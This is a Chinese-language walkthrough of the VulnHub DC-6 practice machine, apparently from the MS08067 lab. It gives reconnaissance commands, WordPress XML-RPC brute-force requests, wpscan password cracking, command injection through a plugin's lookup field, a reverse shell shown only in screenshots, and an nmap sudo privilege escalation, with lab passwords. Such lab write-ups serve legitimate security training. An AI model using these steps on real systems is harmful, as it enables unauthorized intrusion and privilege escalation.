【VulnHub靶机系列】DC6

文章来源|MS08067 安全实验室

本文作者:大方子(Ms08067实验室核心成员)

主机信息

Kali:192.168.0.128 DC-6:192.168.0.130

实验过程

先找到DC-6的IP地址

sudo arp-scan --interface eth0 192.168.0.1/24

2aaee93785944d563ae8b0b3bb27aa2b.png


然后用Nmap对DC-6进行扫描

sudo nmap -sS -sC -sV -p- 192.168.0.130

ea1557b2b0848143d514c82a9f553cc5.png


可以看到主机开放了80 和 22端口

通过扫描结果可以看出,通过80端口访问DC-6的web服务会被重定向到http://wordy/

这里我们需要修改下Host,让http://wordy/指向192.168.0.130

3a5692669beeaff1e0589ffd4340eb55.png


这里要注意是访问的是http://wordy/而不是http://wordy.com

fafc1dc518509289f1a9a8e541049702.png


80ccc91963b0b27dd699db7ec6f8165d.png


可以看到是wp来进行搭建的,跟DC-2类似

这里我们先用wpscan扫描下看看当前网站看看有没有什么有用的信息

wpscan --url http://wordy/

可以看到wp开启了XML-RPC

8b6c76661b871dc07de81c9b01cd5273.png

当前的wp版本是5.1.1

d63e31153dde8230020477dac9f79e23.png

这里稍微介绍下WP的XML-RPC的漏洞知识

我们可以通过XML-RPC,查看目标网站支持的方法

POST /xmlrpc.php HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

119a3180b87cd2dc4b698493a332d8e4.png


一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。

586d90281822a08ef9c9f0e84b093557.png

参数构造如下,如果爆破成功则会返回相应的博客内容

POST /xmlrpc.php HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 174

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

99bbc2e585f41725233f9165c579d95d.png


在wp版本低于3.5.1中还可以利用pingback.ping进行端口扫描、文件读取的功能这里不展开描述

接下来对网站的用户进行遍历

wpscan --url http://wordy/ -e u

88c0b3b24dbf2dcaf66e13ee20b55489.png


将这些用户名记录下来,爆破用

a6db07896d4b505aa65af182e458647b.png


wpscan --url http://wordy/ -U wp-users -P /usr/share/wordlists/rockyou.txt

f701b274907a254956e4817b140300bf.png


得到账号密码

账号:mark 密码:helpdesk01

wp默认的后台地址为/wp-admin

在Activity monitor/tools中找到lookup,可以命令拼接来进行命令执行

3df5e8e73611f5a6ca8513caf986a958.png


常见的命令连接符有(|,&&,||这三个连接符都是Windows系统与Linux系统共有的,而&是Windows系统特有,;是Linux系统特有的)

A|B:无论执行的A命令是否正确,B命令都执行
A&&B:只有在A命令成功执行的前提下,B命令才可以执行
A||B:只有在A命令没有执行失败的前提下,B命令才可以执行
A&B:不管A是否执行成功,B命令都会执行
A;B:不管A是否执行成功,B命令都会执行

967889a23eecc0aad91eb16ca42f9f78.png


接下来开始反弹shell

5ea38a3f0ae389999d269696626a32a7.png


85e9f644e751372201bba0c5564f423b.png


在jens目录下发现backups.sh脚本

e7cc61c892723a15b5dbb305e66d5fc2.png


想尝试编辑这个脚本,发现没有权限

01ecbcb88338cd9dd2752cbba85b23da.png

接着继续翻找信息,找到graham的账号信息

bd33384d0656550f656c74b735222ac5.png

graham - GSo7isUM1D4

直接通过SSH登录到graham

d195dc3a1f71056679c8dee5db4d2124.png

查看其sudo权限,可以看到graham可以不用密码,以jens权限来运行/home/jens/backups.sh脚本

f9711f5387c3cd8d58ed268a9a880704.png


修改backups.sh来反弹jens的权限

badd511a15f4d49c8262204393af9435.png

然后以jens身份来执行脚本

sudo -u jens /home/jens/backups.sh

3cfb66fb33ead5f19778c96ce95c03fa.png


得到jens的权限

1903d18d37c03219c5b0b3041cd04d8d.png

查看Jens的sudo权限,可以看到jens可以无密码通过root权限来运行nmap

415bcb207eabcbf7d402817e6875f789.png

那么接下来就通过nmap来进行提权

echo 'os.execute("/bin/bash")' > root.sh
sudo nmap --script=root.sh

得到root权限

948f9b906fa56c4ef03f09c56047423c.png

—  实验室旗下直播培训课程  —

9959f48ada3f85b38d56b7d5514dbcd2.jpeg

bcb5cf80c71379fa7df16fdca45bc342.jpeg

c25a9f99fe0665d9d9529e37006e1e84.jpeg

407ee72ee1060819a8f7f706c7f03ea6.jpeg

3c9a33d0bb2cb40a3f1b20e532ecc63a.jpeg


来和10000+位同学加入MS08067一起学习吧!

fd79cc9ff41bcfbdbbfaa55911ed6ff1.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值